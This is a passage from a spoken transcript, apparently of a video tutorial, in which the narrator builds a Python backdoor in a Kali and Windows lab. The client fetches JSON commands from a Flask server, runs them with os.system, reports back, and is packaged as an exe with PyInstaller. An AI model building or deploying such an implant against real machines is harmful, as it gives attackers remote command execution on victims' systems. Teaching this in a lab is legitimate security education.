something. So get the current date as a string and then embed it as part of this Python object. So without getting too off into the weeds about it. So notice that our code was technically working over here. It's just we were getting a 500 or a server side error, not a 200. And we're saying got command, this timestamp, ping, so on and so forth. Well, what it's trying to do is run the entirety of that string. That's not what we need it to do. So we're going to change our code. We're going to say the command is equal to JSON. Oh, I'm sorry. We need to import the JSON module here. Import JSON. What am I doing? JSON.loads. You're going to load an object from a string, loads with plural, almost plural, but it's load string. Loads response dot text. The text is the string that you're loading, and then ultimately JSON object is that, and your command CMD is equal to the JSON object obj, and then this is basically creating that dictionary for you again. And I'm looking for the CMD key within that. So there's other ways to get access to that key. I can do .get key. That's a better way to do it because your program won't crash if that key doesn't exist. And then rather than running os.system, I can do just os.system command, and then rather than the whole text, I can just say just this part. I can also do away with like printing the whole response.text. I'm going to put server time equals JSON obj.get timestamp, I think is what it was. And then I can print server time. Okay. So now I've teased the part information. Okay. So I said I wanted to make this interactive. I want my client to send back to the server, say, okay, I got some information from this thing, right? I'm running now. So what am I trying to do here? I want it to make a post. I'm going to set up the same sort of concept here where I have a response object, but this time I'm giving a response to, rather than a get method, I'm making a request as a post method. So response equals requests dot post to malware server. And so this is where our logic on the server is going to get complicated. Actually, I don't know that we need to right now. I'm gonna leave it like this. I'm just sending a post, and the fact that I'm sending a post will be good enough for right now. No, it's not. It's not good enough right now. Data equals status. Okay. Data equals, equals data. So what is this looking like? I'm creating a variable called data. It's a dictionary, the key status value, okay, right? Just sounds like a confirmation. The status of something is okay. And I'm going to make a post request to the malware server. Slash okay, so what's happening here? I'm saying I want, this is what it's going to look like. Copy. So I'm making a new request to this website, new command / response. I could, if I had architected this differently, in fact, I'm going to architect it differently right now. CD. So that's that website. That's that website. When I say malware server is this base URL. Another way to sort of think of that is the base of the URL, and then I can add on different I guess endpoints that I can talk to. So I can send the responses to /response or resp with this particular data. So check this out. What that's going to do is make our logic a lot cleaner on the server, so it's not as confusing. So I'm going to save this. Nothing should be broken yet. It's going to try this, and it's going to just fail. So I'm going to go to my this. Where's my server? New command. And another cool thing about this, it doesn't matter which order you sort of put these things in. I can say app.route. I really hope post. It's not there. App.route. And then what is it? Resp is what I said. But I have to do one thing different. I have to say methods equals post. By default, it allows methods equals get. There's a new version of Flask out, Flash 2.0, which allows you to just do a really clean syntax, which is app.post, app.get, app. So on and so forth, without having to do this whole back end part here. Unfortunately, it's not installed here. I can get it installed, but it's one of those things where you like, is it worth struggling through the video to do it? Maybe it is. Sudo apt install python 3-pip. Make sure that we have pip installed. Yeah, it's yeah. Oh man, see, there it is right there. What did it say? Oh, okay. Sudo apt update. Let that run. Anyway, let's do it this way, and then I'll show you what that other thing looks like. So def, we'll call this response from malware. We have to incorporate one thing. So let's say print got a response from malware. Save that. Okay. All right. So if I save my server, you'll notice that it's working here. There's one additional thing I need to do, and that is import what they call this is a little bit of unfortunate, that's not unfortunate, it's just the way computers work, overlap in terminology. So we're going to import the request object from Flask. That's not request, it's not the request module we're using to make them. This is the other side of it, the server side. Like when someone goes to a website, they've made a web request. I want to look at that request. Print request, request dot, and I want to look at the form data, particularly like the form values of it. So let's see what that does. And this is when someone sends information to a server, they send it as, oh, I'm sorry, not from values. That's not at all what I thought that was. I misread that word. Form. I think that should be the entire dictionary, like everything that is sent to the server. So when you make a request, you send information to a server, you usually send it as form request data. So let's kill the malware that's running. Like we had it running over here this whole time. I'm going to interrupt it with Control-C, and I'm just going to rerun it because we're prototyping right now on our Windows machine. Let's see what happens. Whoop, system argument 1 must be a stir, not none. Okay, where did that come from? Get. Oh, hold on. That's all right. Well, the big syntax error there is I typed the key name. Like I was probably saying like JSON object dot get key. I probably meant CMD and was saying that, oh, this is the name of any key that you're looking for. And because key doesn't exist, it by default returns the value none. And so that's why you got this message here. System argument 1 must be a string, not none. So if I run it, boom, is malware. All right, getting new commands from this place. It shows the time, it runs the command, and that's that. It's now updating. And then also, it seems like it should be sending a message back to the server. So let's go over to our Kali machine. And I'm getting errors the entire time. That's because this function, what it's saying is it says type error. The view function did not return a valid response. The function either returned none or ended without a return statement. This function does not have a return statement in it. Return, I can just return thanks for responding. Okay. So it doesn't matter. Like I could return an empty string. This is just that acknowledgement that I'm getting from my malware that yes, you sent some information back to me. So let me reload the malware, because right now I stopped the server, but I didn't stop it on the client side. Notice that it crashed. This is where error handling comes in, right? I need to tell it, what do you do? How do you behave if you cannot reach the server? Should you just crash or should you try again in 30 seconds? Okay, so let me, where am I at? I'm gonna start the server. Server, it should be running. Come over to my Windows, start the malware. This is malware, it's doing its thing. It's running, doesn't seem to be crashing. If I come over to my Kali machine again, I'm printing out status okay. These are things that I get back from the client. Status okay came from this Windows computer. It came from right here. I can add additional things to it. For instance, if I bring in the date time over here, import date time. this timestamp. Oops. And I want the string. Remember, we fell into this trap before. Datetime dot datetime dot now. Right. And if I start my malware again, notice this time my server should be getting a timestamp from the client. So I have a timestamp of like when I sent messages to the client, when I've received a response from the client. So I now have like call and response. I have bi-directional communication. Not only do I could send the results of a command. So if I wanted to have real-time interaction, just like with Meterpreter, I could capture the output of a command using subprocess. That's why we have subprocess in there. We're not using it yet, but I could capture the output of a command and then send that back to the server, right? So I think man, at some point I've got to stop this video. Otherwise it's going to just take forever. So let's we got to package our malware. Let's do that. I'm going to type PyInstaller, one file, malware.py. With any luck, it's going to run this thing. And it should exist within this folder. Man, any second now. Now we use additional libraries, so it's having to like search further, right? That's why it's taking longer. But it says building exe from this completed successfully. By looking here, if I double click it, sure enough, it's still working. Let me go over to this. Is my server being updated with new commands? It's getting a new request. It's gotten a response from somebody. Man, our malware is working. Good deal. That's the end of this long video. Sorry, y'all, but that's, you know, computers, man. I don't know what to tell you. Questions, comments, concerns, definitely reach out. I hope that you found this useful. You'll continue to find it useful. Thanks.